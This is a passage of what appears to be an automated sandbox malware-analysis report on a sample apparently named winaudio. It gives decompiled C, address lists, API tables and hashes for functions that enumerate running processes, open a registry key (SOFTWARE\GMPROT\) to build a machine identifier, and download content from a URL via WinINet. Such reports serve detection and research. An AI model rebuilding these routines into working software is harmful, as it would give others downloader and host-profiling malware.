									__eflags = _t165 - 0x10;
									if(_t165 < 0x10) {
										goto L40;
									} else {
										_t216 = _v596;
										__eflags = _t165 + 1 - 0x1000;
										if(_t165 + 1 < 0x1000) {
											L39:
											L002E05B1(_t216);
											_t257 = _t257 + 4;
											goto L40;
										} else {
											__eflags = _t216 & 0x0000001f;
											if(__eflags != 0) {
												goto L64;
											} else {
												_t179 =  *(_t216 - 4);
												__eflags = _t179 - _t216;
												if(__eflags >= 0) {
													goto L64;
												} else {
													_t216 = _t216 - _t179;
													__eflags = _t216 - 4;
													if(__eflags < 0) {
														goto L64;
													} else {
														__eflags = _t216 - 0x23;
														if(__eflags > 0) {
															goto L64;
														} else {
															_t216 = _t179;
															goto L39;
														}
													}
												}
											}
										}
									}
									goto L68;
									L40:
									_t229 = _v1160 + 0x20;
									_t214 =  &(_v1156[0x20]);
									_v576 = 0xf;
									_v580 = 0;
									_v596 = 0;
									_v1160 = _t229;
									_v1156 = _t214;
									__eflags = _t229 - 0x60;
								} while (_t229 < 0x60);
								goto L41;
							}
							goto L68;
							L60:
							_t248 = _v1168;
							_t122 = Process32Next(_t248,  &_v1152);
							__eflags = _t122;
						} while (_t122 != 0);
						CloseHandle(_t248);
						__eflags = 0;
						L62:
						 *[fs:0x0] = _v16;
						_pop(_t245);
						return E002E056D(_v20 ^ _t253, _t229, _t245);
					} else {
						CloseHandle(_t244);
						goto L3;
					}
				}
				L68:
			}



















































































                        0x002d7200
                        0x002d7200
                        0x002d7203
                        0x002d7205
                        0x002d7210
                        0x002d7217
                        0x002d721c
                        0x002d721e
                        0x002d7221
                        0x002d7222
                        0x002d7223
                        0x002d7227
                        0x002d723b
                        0x002d7240
                        0x002d7247
                        0x002d724d
                        0x002d724f
                        0x002d7257
                        0x002d72a0
                        0x00000000
                        0x002d7259
                        0x002d7259
                        0x002d7263
                        0x002d7272
                        0x002d7275
                        0x002d7282
                        0x002d728f
                        0x002d7297
                        0x002d72b0
                        0x002d72b0
                        0x002d72bb
                        0x002d72c7
                        0x002d72d1
                        0x002d72d4
                        0x002d74e5
                        0x002d74e5
                        0x002d74ec
                        0x002d74f2
                        0x002d74f5
                        0x002d74fa
                        0x002d74fd
                        0x002d750a
                        0x002d750f
                        0x002d7512
                        0x00000000
                        0x002d7518
                        0x002d7525
                        0x002d7538
                        0x002d753d
                        0x002d754e
                        0x002d7550
                        0x002d7552
                        0x002d7563
                        0x002d7569
                        0x002d756f
                        0x002d7572
                        0x002d7572
                        0x002d7574
                        0x002d7575
                        0x002d7575
                        0x002d757b
                        0x002d757e
                        0x002d758e
                        0x002d759e
                        0x002d75a3
                        0x002d75a3
                        0x002d75a7
                        0x002d75b1
                        0x002d75b1
                        0x002d75b7
                        0x002d75bd
                        0x002d75c0
                        0x002d75c0
                        0x002d75c2
                        0x002d75c3
                        0x002d75c3
                        0x002d75c9
                        0x002d75cc
                        0x00000000
                        0x002d75d2
                        0x002d75f1
                        0x002d75f6
                        0x002d75fc
                        0x002d75ff
                        0x002d7602
                        0x002d7602
                        0x002d7604
                        0x002d7605
                        0x002d7605
                        0x002d760b
                        0x002d760e
                        0x00000000
                        0x002d7614
                        0x002d7614
                        0x002d761b
                        0x002d7621
                        0x002d7624
                        0x002d7629
                        0x002d762f
                        0x002d7632
                        0x002d7638
                        0x002d7647
                        0x002d7653
                        0x002d765b
                        0x002d765d
                        0x00000000
                        0x002d765f
                        0x002d765f
                        0x002d765f
                        0x002d7661
                        0x002d7661
                        0x002d7666
                        0x002d7669
                        0x002d766b
                        0x002d766b
                        0x002d7675
                        0x002d767a
                        0x002d767d
                        0x002d767f
                        0x00000000
                        0x00000000
                        0x002d7685
                        0x002d7690
                        0x002d7696
                        0x002d7699
                        0x002d76a3
                        0x002d76ad
                        0x002d76b3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d76b3
                        0x00000000
                        0x002d7661
                        0x002d765d
                        0x002d760e
                        0x002d75cc
                        0x002d72da
                        0x002d72da
                        0x002d72dc
                        0x002d72e0
                        0x002d72e2
                        0x002d72e7
                        0x002d72ea
                        0x002d72ea
                        0x002d72ee
                        0x002d72ee
                        0x002d72f4
                        0x002d72f9
                        0x002d72ff
                        0x002d7305
                        0x002d7310
                        0x002d7310
                        0x002d7313
                        0x002d7317
                        0x002d731b
                        0x002d731b
                        0x002d731d
                        0x002d7324
                        0x002d7329
                        0x002d732f
                        0x002d7333
                        0x002d7336
                        0x002d7339
                        0x002d733d
                        0x002d7340
                        0x00000000
                        0x002d7342
                        0x002d7342
                        0x002d7344
                        0x00000000
                        0x002d7346
                        0x002d7346
                        0x002d7349
                        0x002d76f5
                        0x002d76fa
                        0x002d76fa
                        0x002d76ff
                        0x002d7700
                        0x002d7703
                        0x002d7707
                        0x002d7718
                        0x002d771e
                        0x002d7720
                        0x002d7722
                        0x002d7729
                        0x002d772c
                        0x002d7731
                        0x002d7737
                        0x002d773f
                        0x002d773f
                        0x002d7744
                        0x002d7749
                        0x002d7751
                        0x00000000
                        0x002d7751
                        0x002d775a
                        0x002d734f
                        0x002d734f
                        0x00000000
                        0x002d734f
                        0x002d7349
                        0x002d7344
                        0x00000000
                        0x002d7354
                        0x002d7354
                        0x002d735a
                        0x002d735b
                        0x002d735b
                        0x002d7360
                        0x002d7364
                        0x002d736e
                        0x002d7378
                        0x002d737f
                        0x002d7385
                        0x002d7388
                        0x002d7388
                        0x002d7390
                        0x002d7390
                        0x002d7392
                        0x002d7393
                        0x002d7393
                        0x002d7397
                        0x002d7397
                        0x002d7381
                        0x002d7381
                        0x002d7381
                        0x002d7399
                        0x002d739e
                        0x002d73a4
                        0x002d73a9
                        0x002d73b0
                        0x002d73b6
                        0x002d73bc
                        0x002d73be
                        0x002d7416
                        0x002d7416
                        0x002d741c
                        0x002d741e
                        0x002d7424
                        0x002d7429
                        0x002d7429
                        0x002d742f
                        0x002d7431
                        0x002d7433
                        0x00000000
                        0x002d7433
                        0x002d73c0
                        0x002d73c0
                        0x002d73c6
                        0x002d73c8
                        0x00000000
                        0x002d73ca
                        0x002d73d1
                        0x002d73dd
                        0x002d73df
                        0x002d73e5
                        0x002d73eb
                        0x002d73ed
                        0x002d73f3
                        0x002d73f8
                        0x002d73fe
                        0x002d7404
                        0x002d7404
                        0x002d740d
                        0x002d7410
                        0x002d7412
                        0x002d7439
                        0x002d743c
                        0x002d7441
                        0x002d7441
                        0x002d7412
                        0x002d73c8
                        0x002d744a
                        0x002d7451
                        0x002d7457
                        0x002d745d
                        0x002d7460
                        0x00000000
                        0x002d7462
                        0x002d7462
                        0x002d7469
                        0x002d746e
                        0x002d749a
                        0x002d749b
                        0x002d74a0
                        0x00000000
                        0x002d7470
                        0x002d7470
                        0x002d7473
                        0x00000000
                        0x002d7479
                        0x002d7479
                        0x002d747c
                        0x002d747e
                        0x00000000
                        0x002d7484
                        0x002d7484
                        0x002d7486
                        0x002d7489
                        0x00000000
                        0x002d748f
                        0x002d748f
                        0x002d7492
                        0x00000000
                        0x002d7498
                        0x002d7498
                        0x00000000
                        0x002d7498
                        0x002d7492
                        0x002d7489
                        0x002d747e
                        0x002d7473
                        0x002d746e
                        0x00000000
                        0x002d74a3
                        0x002d74af
                        0x002d74b2
                        0x002d74b5
                        0x002d74bf
                        0x002d74c9
                        0x002d74d0
                        0x002d74d6
                        0x002d74dc
                        0x002d74dc
                        0x00000000
                        0x002d7310
                        0x00000000
                        0x002d76b5
                        0x002d76b5
                        0x002d76c3
                        0x002d76c9
                        0x002d76c9
                        0x002d76d2
                        0x002d76d8
                        0x002d76da
                        0x002d76dd
                        0x002d76e6
                        0x002d76f4
                        0x002d7299
                        0x002d729a
                        0x00000000
                        0x002d729a
                        0x002d7297
                        0x00000000

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002D7247
                        • Process32First.KERNEL32(00000000,0000022C), ref: 002D728F
                        • CloseHandle.KERNEL32(00000000), ref: 002D729A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                        • String ID: pB_nEDMlKDMs_
                        • API String ID: 1083639309-2455339390
                        • Opcode ID: a0d001c5412fa41fbde0ed121ba27b9d354bb99630a4a88762e9d7c8ac3c860b
                        • Instruction ID: f21d149808b123e02fecf379f6f68fd68f2137022f8936ae1330475f5b5e444e
                        • Opcode Fuzzy Hash: a0d001c5412fa41fbde0ed121ba27b9d354bb99630a4a88762e9d7c8ac3c860b
                        • Instruction Fuzzy Hash: 35D148B19142158BDB2ADF28CC957BE77B8FB44304F44419AE805AB392F774AE44CF84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DDC90 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 257registryCOMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 824 2ddc90-2ddcd5 825 2ddcd7-2ddcde 824->825 826 2ddce8-2ddced 825->826 827 2ddce0-2ddce4 825->827 828 2ddcf0-2ddd2b wsprintfA 826->828 827->825 829 2ddce6 827->829 830 2ddd30-2ddd35 828->830 831 2ddd54-2ddd76 829->831 830->830 832 2ddd37-2ddd4c 830->832 833 2ddd7c-2ddd81 831->833 834 2ddd78-2ddd7a 831->834 832->828 835 2ddd4e 832->835 837 2ddd84-2ddd89 833->837 836 2ddd8d-2dddf2 call 2d0860 GetNativeSystemInfo 834->836 835->831 841 2dddf4-2dddfc 836->841 842 2dde02 836->842 837->837 838 2ddd8b 837->838 838->836 841->842 843 2dddfe-2dde00 841->843 844 2dde07-2dde47 RegOpenKeyExA 842->844 843->844 845 2dde49-2dde51 844->845 846 2dde53-2dde73 RegOpenKeyExA 844->846 845->846 847 2dde87-2ddef9 call 37e1a0 RegQueryValueExA 845->847 848 2ddffe-2de018 846->848 849 2dde79-2dde81 846->849 856 2ddf6c-2ddfb6 RegCloseKey 847->856 857 2ddefb-2ddf3a call 383a09 847->857 851 2de03e-2de044 848->851 852 2de01a-2de023 848->852 849->847 849->848 855 2de046-2de04f 851->855 854 2de025-2de03c call 37c730 852->854 852->855 854->855 859 2de052-2de06e call 2e056d 855->859 860 2ddfe8-2ddfee 856->860 861 2ddfb8-2ddfc1 856->861 870 2ddf3c-2ddf3e 857->870 871 2ddf40-2ddf49 857->871 865 2ddff0-2ddffc 860->865 861->865 866 2ddfc3-2ddfe6 call 37c730 861->866 865->859 866->859 873 2ddf59-2ddf67 call 2d0860 870->873 874 2ddf50-2ddf55 871->874 873->856 874->874 875 2ddf57 874->875 875->873
                        C-Code - Quality: 73%
                        			E002DDC90(void* __ebx, int __ecx, void* __edi) {
				int* _v8;
				char _v16;
				signed int _v20;
				char _v276;
				int _v280;
				int* _v284;
				char _v300;
				void* _v304;
				char _v305;
				short _v307;
				char _v308;
				int _v312;
				int _v316;
				int _v320;
				int* _v324;
				int* _v328;
				char _v360;
				void* __esi;
				signed int _t71;
				signed int _t72;
				char _t74;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				void* _t86;
				intOrPtr _t88;
				long _t92;
				long _t94;
				signed int _t103;
				signed int _t105;
				signed int _t114;
				signed int _t116;
				signed int _t124;
				signed int _t126;
				intOrPtr _t131;
				void* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				void* _t139;
				int _t144;
				intOrPtr* _t155;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t164;
				void* _t166;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				signed int _t171;
				void* _t172;
				void* _t173;
				void* _t175;

				_t134 = __ebx;
				_push(0xffffffff);
				_push(0x39ccab);
				_push( *[fs:0x0]);
				_t173 = _t172 - 0x158;
				_t71 =  *0x3e1008; // 0x847b54ee
				_t72 = _t71 ^ _t171;
				_v20 = _t72;
				_push(_t72);
				 *[fs:0x0] =  &_v16;
				_t168 = __ecx;
				_v316 = __ecx;
				_v312 = __ecx;
				_v324 = 0;
				_t74 = 0;
				while( *((char*)(_t74 + 0x3f098c)) == 0) {
					_t74 = _t74 + 1;
					if(_t74 < 8) {
						continue;
					}
					L9:
					_v280 = 0xf;
					_v284 = 0;
					_v300 = 0;
					if("{abababab-baba-abab-baba-ecf4bb862ded}" != 0) {
						_t138 = "{abababab-baba-abab-baba-ecf4bb862ded}";
						_t160 = _t138 + 1;
						do {
							_t81 =  *_t138;
							_t138 = _t138 + 1;
						} while (_t81 != 0);
						_t139 = _t138 - _t160;
						L14:
						E002D0860(_t134,  &_v300, "{abababab-baba-abab-baba-ecf4bb862ded}");
						_v8 = 0;
						asm("xorps xmm0, xmm0");
						_v328 = 0;
						asm("movups [ebp-0x164], xmm0");
						asm("movups [ebp-0x154], xmm0");
						 *0x39e080( &_v360, _t139);
						_t85 =  *0x3ebc20; // 0x6
						_t86 = _t85 + 2;
						_t87 =  >  ? 0 : _t86;
						 *0x3ebc20 =  >  ? 0 : _t86;
						_t88 = _v360;
						if(9 == _t88 || 6 == _t88) {
						}
						 *0x3f0830 = 0x7ff7;
						_v304 = 0;
						_t161 = 0xf003f;
						_t91 =  !=  ? 0xf003f : 0xf013f;
						_t92 = RegOpenKeyExA(0x80000002, "SOFTWARE\\GMPROT\\", 0,  !=  ? 0xf003f : 0xf013f,  &_v304); // executed
						if(_t92 != 0) {
							L20:
							_t94 = RegOpenKeyExA(0x80000002, "SOFTWARE\\GMPROT\\", 0, 0xf003f,  &_v304); // executed
							if(_t94 != 0) {
								L34:
								 *(_t168 + 0x14) = 0xf;
								 *(_t168 + 0x10) = 0;
								 *_t168 = 0;
								_t144 = _v280;
								if(_t144 >= 0x10) {
									 *_t168 = _v300;
								} else {
									_t100 =  &(_v284[0]);
									if( &(_v284[0]) != 0) {
										E0037C730(_t168,  &_v300, _t100);
										_t144 = _v280;
									}
								}
								 *(_t168 + 0x10) = _v284;
								 *(_t168 + 0x14) = _t144;
								goto L39;
							}
							_t166 = _v304;
							if(_t166 == 0) {
								goto L34;
							}
							goto L22;
						} else {
							_t166 = _v304;
							if(_t166 != 0) {
								L22:
								_t103 =  *0x3ebc24; // 0x6556
								_t105 =  >  ? 0 : _t103 + 2;
								 *0x3ebc24 = _t105;
								 *0x3f0830 = _t105 & 0x00000019 | 0x000000e0;
								E0037E1A0(_t166,  &_v276, 0, 0xff);
								_t175 = _t173 + 0xc;
								_v320 = 0xff;
								_v312 = 1;
								if(RegQueryValueExA(_t166, 0x3dd5bc, 0,  &_v312,  &_v276,  &_v320) != 0) {
									L29:
									_t114 =  *0x3ebc34; // 0x6556
									_t116 =  >  ? 0 : _t114 + 2;
									 *0x3ebc34 = _t116;
									 *0x3f0830 = _t116 & 0x00000019 | 0x000000e0;
									RegCloseKey(_v304);
									 *(_t168 + 0x14) = 0xf;
									 *(_t168 + 0x10) = 0;
									 *_t168 = 0;
									_t161 = _v280;
									if(_t161 >= 0x10) {
										 *_t168 = _v300;
										L33:
										 *(_t168 + 0x10) = _v284;
										 *(_t168 + 0x14) = _t161;
										L39:
										 *[fs:0x0] = _v16;
										_pop(_t170);
										return E002E056D(_v20 ^ _t171, _t161, _t170);
									}
									_t121 =  &(_v284[0]);
									if( &(_v284[0]) == 0) {
										goto L33;
									}
									E0037C730(_t168,  &_v300, _t121);
									_t161 = _v280;
									 *(_t168 + 0x10) = _v284;
									 *(_t168 + 0x14) = _v280;
									goto L39;
								}
								_t124 =  *0x3ebc38; // 0x6556
								_t126 =  >  ? 0 : _t124 + 2;
								 *0x3ebc38 = _t126;
								 *0x3f0830 = _t126 & 0x00000019 | 0x000000e0;
								E00383A09( &_v276, 0xff);
								_t175 = _t175 + 8;
								if(_v276 != 0) {
									_t155 =  &_v276;
									_t41 = _t155 + 1; // 0x1
									_t162 = _t41;
									do {
										_t131 =  *_t155;
										_t155 = _t155 + 1;
									} while (_t131 != 0);
									_t156 = _t155 - _t162;
									L28:
									_push(_t156);
									E002D0860(_t134,  &_v300,  &_v276);
									goto L29;
								}
								_t156 = 0;
								goto L28;
							}
							goto L20;
						}
					}
					_t139 = 0;
					goto L14;
				}
				_t169 = 0;
				_t7 = _t169 - 0xc; // -12
				_t164 = _t7;
				do {
					_v308 = 0;
					_v307 = 0;
					_v305 = 0;
					_t11 = _t169 + 0x3f098c; // 0x86bbf4ec
					_push( *_t11 & 0x000000ff);
					wsprintfA( &_v308, "%02x");
					_t136 = "{abababab-baba-abab-baba-ecf4bb862ded}";
					_t173 = _t173 + 0xc;
					_t159 = _t136 + 1;
					do {
						_t79 =  *_t136;
						_t136 = _t136 + 1;
					} while (_t79 != 0);
					_t169 = _t169 + 1;
					 *((short*)(_t136 - _t159 + _t164 + 0x3eb963)) = _v308;
					_t164 = _t164 + 2;
				} while (_t164 < 0);
				_t168 = _v316;
				goto L9;
			}

























































                        0x002ddc90
                        0x002ddc93
                        0x002ddc95
                        0x002ddca0
                        0x002ddca1
                        0x002ddca7
                        0x002ddcac
                        0x002ddcae
                        0x002ddcb3
                        0x002ddcb7
                        0x002ddcbd
                        0x002ddcbf
                        0x002ddcc5
                        0x002ddccb
                        0x002ddcd5
                        0x002ddcd7
                        0x002ddce0
                        0x002ddce4
                        0x00000000
                        0x00000000
                        0x002ddd54
                        0x002ddd5b
                        0x002ddd65
                        0x002ddd6f
                        0x002ddd76
                        0x002ddd7c
                        0x002ddd81
                        0x002ddd84
                        0x002ddd84
                        0x002ddd86
                        0x002ddd87
                        0x002ddd8b
                        0x002ddd8d
                        0x002ddd99
                        0x002ddd9e
                        0x002dddab
                        0x002dddae
                        0x002dddb9
                        0x002dddc0
                        0x002dddc7
                        0x002dddcd
                        0x002dddd4
                        0x002ddddc
                        0x002ddde4
                        0x002ddde9
                        0x002dddf2
                        0x002dddf2
                        0x002dde0d
                        0x002dde1b
                        0x002dde25
                        0x002dde2f
                        0x002dde3f
                        0x002dde47
                        0x002dde53
                        0x002dde6b
                        0x002dde73
                        0x002ddffe
                        0x002ddffe
                        0x002de005
                        0x002de00c
                        0x002de00f
                        0x002de018
                        0x002de044
                        0x002de01a
                        0x002de020
                        0x002de023
                        0x002de02e
                        0x002de033
                        0x002de039
                        0x002de023
                        0x002de04c
                        0x002de04f
                        0x00000000
                        0x002de04f
                        0x002dde79
                        0x002dde81
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002dde49
                        0x002dde49
                        0x002dde51
                        0x002dde87
                        0x002dde87
                        0x002dde9b
                        0x002dde9e
                        0x002ddeab
                        0x002ddeb8
                        0x002ddebd
                        0x002ddec0
                        0x002dded0
                        0x002ddef9
                        0x002ddf6c
                        0x002ddf6c
                        0x002ddf81
                        0x002ddf84
                        0x002ddf91
                        0x002ddf96
                        0x002ddf9c
                        0x002ddfa3
                        0x002ddfaa
                        0x002ddfad
                        0x002ddfb6
                        0x002ddfee
                        0x002ddff0
                        0x002ddff6
                        0x002ddff9
                        0x002de052
                        0x002de057
                        0x002de060
                        0x002de06e
                        0x002de06e
                        0x002ddfbe
                        0x002ddfc1
                        0x00000000
                        0x00000000
                        0x002ddfcc
                        0x002ddfda
                        0x002ddfe0
                        0x002ddfe3
                        0x00000000
                        0x002ddfe3
                        0x002ddefb
                        0x002ddf0f
                        0x002ddf12
                        0x002ddf1f
                        0x002ddf2b
                        0x002ddf30
                        0x002ddf3a
                        0x002ddf40
                        0x002ddf46
                        0x002ddf46
                        0x002ddf50
                        0x002ddf50
                        0x002ddf52
                        0x002ddf53
                        0x002ddf57
                        0x002ddf59
                        0x002ddf59
                        0x002ddf67
                        0x00000000
                        0x002ddf67
                        0x002ddf3c
                        0x00000000
                        0x002ddf3c
                        0x00000000
                        0x002dde51
                        0x002dde47
                        0x002ddd78
                        0x00000000
                        0x002ddd78
                        0x002ddce8
                        0x002ddcea
                        0x002ddcea
                        0x002ddcf0
                        0x002ddcf2
                        0x002ddcf9
                        0x002ddd00
                        0x002ddd06
                        0x002ddd0d
                        0x002ddd1a
                        0x002ddd20
                        0x002ddd25
                        0x002ddd28
                        0x002ddd30
                        0x002ddd30
                        0x002ddd32
                        0x002ddd33
                        0x002ddd40
                        0x002ddd41
                        0x002ddd49
                        0x002ddd49
                        0x002ddd4e
                        0x00000000

                        APIs
                        • wsprintfA.USER32 ref: 002DDD1A
                        • GetNativeSystemInfo.KERNEL32(?,{abababab-baba-abab-baba-ecf4bb862ded},{abababab-baba-abab-baba-ecf4bb862ded}), ref: 002DDDC7
                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\GMPROT\,00000000,000F013F,?), ref: 002DDE3F
                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\GMPROT\,00000000,000F003F,00000000), ref: 002DDE6B
                        • RegQueryValueExA.ADVAPI32(00000000,003DD5BC,00000000,00000001,?,000000FF), ref: 002DDEF1
                        • RegCloseKey.ADVAPI32(00000000), ref: 002DDF96
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Open$CloseInfoNativeQuerySystemValuewsprintf
                        • String ID: %02x$SOFTWARE\GMPROT\${abababab-baba-abab-baba-ecf4bb862ded}
                        • API String ID: 1874670420-2866349992
                        • Opcode ID: ecc4eabe33d45165b5cb570eae0ad6ef492c30f1e638198b75ae08d5c3ab2a43
                        • Instruction ID: 3464be911705969fc538c35ff77610d6aa0963f3d9518ddf52fe7db0ca2d4da6
                        • Opcode Fuzzy Hash: ecc4eabe33d45165b5cb570eae0ad6ef492c30f1e638198b75ae08d5c3ab2a43
                        • Instruction Fuzzy Hash: A4B1AF719102588FDB36CF24CC957FAB7B8EB49304F4005AAE54AAB391DBB45E94CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037B080 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 74%
                        			E0037B080(void* __ebx, void* __edx, void* __edi, char* _a4, void* _a8, long* _a12) {
				DWORD* _v8;
				char _v16;
				signed int _v20;
				void _v52;
				intOrPtr _v56;
				long _v60;
				char _v76;
				long _v80;
				long _v84;
				long* _v88;
				void* _v92;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t37;
				void* _t41;
				void* _t44;
				long _t50;
				int _t54;
				void _t60;
				void* _t69;
				long* _t70;
				long _t71;
				void* _t72;
				void* _t86;
				char* _t91;
				void* _t92;
				long _t93;
				signed int _t97;

				_t86 = __edx;
				_push(0xffffffff);
				_push(0x39d008);
				_push( *[fs:0x0]);
				_t36 =  *0x3e1008; // 0x847b54ee
				_t37 = _t36 ^ _t97;
				_v20 = _t37;
				_push(_t37);
				 *[fs:0x0] =  &_v16;
				_t91 = _a4;
				_v92 = _a8;
				_v88 = _a12;
				_t41 = InternetOpenA(0, 1, 0, 0, 0); // executed
				_t88 = _t41;
				if(_t88 != 0) {
					_t44 = InternetOpenUrlA(_t88, _t91, 0, 0, 0x4000000, 0); // executed
					_t69 = _t44;
					if(_t69 == 0) {
						L4:
						InternetCloseHandle(_t88);
						goto L5;
					} else {
						_v80 = 0x20;
						if(HttpQueryInfoA(_t69, 5,  &_v52,  &_v80, 0) != 0) {
							 *0x3ee038 = 0x6f97;
							_t50 = E00380DFB(_t72,  &_v52);
							_v56 = 0xf;
							_t93 = _t50;
							_v60 = 0;
							_v76 = 0;
							_v8 = 0;
							if(_t93 != 0) {
								_push(0);
								E002D1A80(_t69,  &_v76, _t88, _t93);
							} else {
								_v60 = _t93;
								 *(_t97 + _t93 - 0x48) = _t50;
							}
							_t53 =  >=  ? _v76 :  &_v76;
							_t54 = InternetReadFile(_t69,  >=  ? _v76 :  &_v76, _t93,  &_v84); // executed
							InternetCloseHandle(_t69); // executed
							InternetCloseHandle(_t88);
							if(_t54 != 0) {
								_t70 = _v88;
								_t96 =  >=  ? _v76 :  &_v76;
								 *_t70 = _v60;
								 *0x3ee038 = 0;
								_push( ~(_v56 - 0x10 > 0) |  *_t70 + 0x00000001);
								_t60 = E00380789( ~(_v56 - 0x10 > 0) |  *_t70 + 0x00000001);
								_t88 = _v92;
								 *_v92 = _t60;
								E0037E1A0(_v92, _t60, 0,  *_t70 + 1);
								E0037A830( *_v92,  *_t70,  >=  ? _v76 :  &_v76,  *_t70);
								_t71 = 1;
							} else {
								_t71 = 0;
							}
							E002D0420(_t71,  &_v76, _t88);
						} else {
							InternetCloseHandle(_t69);
							goto L4;
						}
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t92);
				return E002E056D(_v20 ^ _t97, _t86, _t92);
			}
































                        0x0037b080
                        0x0037b083
                        0x0037b085
                        0x0037b090
                        0x0037b094
                        0x0037b099
                        0x0037b09b
                        0x0037b0a1
                        0x0037b0a5
                        0x0037b0ae
                        0x0037b0b9
                        0x0037b0c1
                        0x0037b0c4
                        0x0037b0ca
                        0x0037b0ce
                        0x0037b0dd
                        0x0037b0e3
                        0x0037b0e7
                        0x0037b10e
                        0x0037b10f
                        0x00000000
                        0x0037b0e9
                        0x0037b0ee
                        0x0037b105
                        0x0037b11f
                        0x0037b12a
                        0x0037b132
                        0x0037b139
                        0x0037b13b
                        0x0037b142
                        0x0037b146
                        0x0037b14f
                        0x0037b15a
                        0x0037b160
                        0x0037b151
                        0x0037b151
                        0x0037b154
                        0x0037b154
                        0x0037b170
                        0x0037b177
                        0x0037b180
                        0x0037b187
                        0x0037b18f
                        0x0037b195
                        0x0037b1a2
                        0x0037b1a8
                        0x0037b1aa
                        0x0037b1c0
                        0x0037b1c1
                        0x0037b1c6
                        0x0037b1c9
                        0x0037b1d2
                        0x0037b1de
                        0x0037b1e6
                        0x0037b191
                        0x0037b191
                        0x0037b191
                        0x0037b1eb
                        0x0037b107
                        0x0037b108
                        0x00000000
                        0x0037b108
                        0x0037b105
                        0x0037b0e7
                        0x0037b1f5
                        0x0037b1fe
                        0x0037b20d

                        APIs
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0037B0C4
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000000,00000000), ref: 0037B0DD
                        • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 0037B0FD
                        • InternetCloseHandle.WININET(00000000), ref: 0037B108
                        • InternetCloseHandle.WININET(00000000), ref: 0037B10F
                        • InternetReadFile.WININET(00000000,00000000,00000000,?), ref: 0037B177
                        • InternetCloseHandle.WININET(00000000), ref: 0037B180
                        • InternetCloseHandle.WININET(00000000), ref: 0037B187
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Internet$CloseHandle$Open$FileHttpInfoQueryRead
                        • String ID:
                        • API String ID: 1133020451-3916222277
                        • Opcode ID: e631d11702509a3bbe920f4060b8cb87ceddce81a98229aa8c8a2135da4f5532
                        • Instruction ID: a359a2ba80cd87c3968ca27acf3a876dcddb01defe25748e49f1b7efec2f3eab
                        • Opcode Fuzzy Hash: e631d11702509a3bbe920f4060b8cb87ceddce81a98229aa8c8a2135da4f5532
                        • Instruction Fuzzy Hash: B5418271A00258AFEB22DFA5DC95FAEBBBCEF04710F544519F905AF281D774A904CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

